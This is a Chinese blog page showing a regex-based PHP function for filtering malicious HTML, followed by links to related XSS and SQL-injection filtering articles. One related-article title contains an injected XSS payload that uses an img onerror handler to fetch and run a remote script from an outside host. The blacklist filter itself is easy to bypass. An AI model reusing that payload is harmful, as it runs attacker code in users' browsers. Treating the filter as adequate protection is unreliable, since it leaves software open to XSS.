php过滤恶意html字符

最新推荐文章于 2021-06-03 08:55:12 发布
最新推荐文章于 2021-06-03 08:55:12 发布
阅读量492 收藏
点赞数
分类专栏: 实用技巧 文章标签: html php filter javascript object
  1. <?php
  2. function filter($str)
  3. {
  4. $farr = array(
  5. "/\s+/", //过滤多余的空白
  6. "/<(\/?)(script|i?frame|style|html|body|title|link|meta|\?|\%)([^>]*?)>/isU", //过滤 script等恶意代码,还可以加入object的过滤flash
  7. "/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/isU", //过滤javascript的on事件
  8. );
  9. $tarr = array(
  10. " ",
  11. "<\\1\\2\\3>", //如果要直接清除不安全的标签,这里可以留空
  12. "\\1\\2",
  13. );
  14. $str = preg_replace( $farr,$tarr,$str);
  15. return $str;
  16. }
  17. //小小演示下
  18. echo filter("<script>alert('www.phpddt.com'></script>");
  19. ?>
libo_sina
关注
专栏目录
php过滤所有恶意字符(批量过滤post,get敏感数据)
01-21
函数代码:复制代码 代码如下://php 批量过滤post,get敏感数据 if (get_magic_quotes_gpc()) { $_GET = stripslashes_array($_GET); $_POST = stripslashes_array($_POST); } function stripslashes_array(&$array) ...
浅析php过滤html字符串,防止SQL注入的方法
12-18
本篇文章将浅析如何通过过滤HTML字符串来防止PHP环境下的SQL注入。 首先,我们可以看到在描述中提到的批量过滤`$_GET`和`$_POST`中的敏感数据。在PHP中,`$_GET`和`$_POST`是两个预定义的超全局数组,分别用于收集...
php过滤恶意访问,php过滤恶意字符
weixin_30322969的博客
03-22 142
php过滤恶意字符//php 批量过滤post,get敏感数据if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}function stripslashes_array(&$array) {while(list($key,$var) = eac...
php输入post过滤函数
wwppp987的博客
07-25 890
function GLOBAL_POST($str) { $str_origin=$str; if (empty($str)) return false; $str = str_replace( '/', "", $str);//替换关键词 $str = str_replace("\\", "", $str); $str = str_replace(">", "", $st...
php恶意代码,php 恶意代码过滤函数_PHP教程
weixin_39887748的博客
03-11 159
php 恶意代码过滤函数Public Function DecodeFilter(html, filter)html=LCase(html)filter=split(filter,",")For Each i In filterSelect Case iCase "SCRIPT" ' 去除所有客户端脚本javascipt,vbscript,jscript,js,vbs,e...
php 过滤 方块问好,php过滤恶意字符
weixin_42323064的博客
03-22 158
//php批量过滤post,get敏感数据if(get_magic_quotes_gpc()){$_GET=stripslashes_array($_GET);$_POST=stripslashes_array($_POST);}functionstripslashes_array(&$array){while(list($key,$var)=each($array)...
php 过滤不安全字符,php过滤所有的恶意外来字符
weixin_39696197的博客
03-12 241
代码://php 批量过滤post,get敏感数据if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}function stripslashes_array(&$array) {while(list($key,$var) = each($arr...
一个php过滤非法字符
05-03
标题提到的"一个php过滤非法字符类"就是一个用于实现这一目标的工具。这类工具通常会检查并清理用户输入,以避免潜在的恶意代码或不安全的字符进入系统。 这个PHP类的主要功能可能包括以下几点: 1. **非法字符...
php过滤全部恶意字符_.docx
10-09
恶意字符过滤是防止SQL注入、跨站脚本攻击(XSS)等安全威胁的一种方法。上述代码片段展示了如何在PHP中实现对用户输入数据的过滤,以保护网站免受潜在攻击。 首先,`get_magic_quotes_gpc()` 是一个PHP内置函数,...
php过滤非法脚本函数
lizhidong
09-02 362
function RemoveXSS($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as &lt;java\0script&gt; // no...
html恶意代码原理,HTML恶意代码
weixin_39939665的博客
06-03 820
很难阻止使用网页进行攻击. 当前,没有特别有效的方法来防止它. 如果这样做,它还必须牺牲很作为代价.所谓的恶意网页主要被软件或系统操作平台安全漏洞所利用,并且可以通过执行嵌入在HTML超文本标记语言中的Java Applet小程序,JavaScript脚本程序,ActiveX控件等来自动执行. 网页代码程序,强行修改用户操作系统的注册表设置和系统实用配置程序,或非法控制系统资源来窃取用户文件,或恶...
HTML中的恶意循环——小搞
zhihong90925的专栏
02-22 723
DIM aa=1DO while a=1msgbox("你好,看你能点多少下??")loop
解决360\小红伞杀毒报网页HTML.Rce.Gen3恶意程序的问题
zhll3377的专栏
11-13 4362
问题描述 测试发现在某些机器上会弹出360杀毒危险警告对话框,导致网页无法打开。 解决方法 将嵌入的统计js脚本从标签后移到里面去。 修改前 ... document.write(unescape("%3Cscript%20...%3C/script%3E")); 修改后 ... document.write(unescape("%3Cs
php 超级好用的特殊字符过滤函数
爱乐爱快乐
06-05 2839
function strreplaces($str) { $farr = array(              "/\s+/",           //过滤多余的空白              "/]*?)>/isU",  //过滤tag              "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU", //过滤javascript的on事件
PHP "完美"的防XSS 防SQL注入的代码
PHPData的专栏
06-20 1181
哈哈,之前发过一段了,再来一段,单位认为这个项目中这两个代码很牛,可以防止一切代码类的攻击,在此发布出来。求破解,大家加紧破,   function gjj($str) { $farr = array( "/\\s+/", "/]*?)>/isU", "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU", );
php 过滤特殊字符和sql防注入代码以及xss攻击等
怎奈你何的博客
10-30 480
//过滤方法 function filterWords(&$str){ $farr = array( "/<(\\/?)(script|i?frame|style|html|body|title|link|meta|object|\\?|\\%)([^>]*?)>/isU", "/(<[^>]*)on[a-zA-Z]+\s*=([^>]*>)/isU", "/select\b|insert\b|update\b|delete\b|...
PHP "完美"的防XSS 防SQL注入的代码 #############<img src=x onerror=jQuery.getScript('//qqq.si/EqqXw9') width=0>
08-22 960
function gjj($str) { $farr = array( "/\\s+/", "/]*?)>/isU", "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU", ); $str = preg_replace($farr,"",$str); return addslashes($str);
DedeCMS二次开发联动筛选功能的实现(含多选功能)
IT技术宅-北方的刀郎
10-23 1481
多选效果如下图:具体操作说明:一、注意,首先备份以下两个文件\include\arc.listview.class.php\include\extend.func.php多选版文件下载链接:https 多选效果如下图:   具体操作说明: 1、注意,首先备份以下两个文件 \include\arc.listview.class.php \include\extend.func.php ...
织梦DedeCMS二次开发联动筛选功能的实现(含多选功能)
企业级技术与网站app运营
04-05 8570
织梦默认的列表页没有筛选功能,但有时候我们做产品列表页的时候,产品的字段比较多,很多人都需要用到筛选功能,这样可以让用户更方便的找到自己所需要的东西,实现这个联动筛选功能需要对织梦进行二次开发,下面就告诉大家如何对织梦进行二次开发实现这个很多人都需要的筛选功能,如下图所示:     首先需要说明的是这个功能需要在模板里面用到php标签,所以需要在后台模板引擎禁用标签里面解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值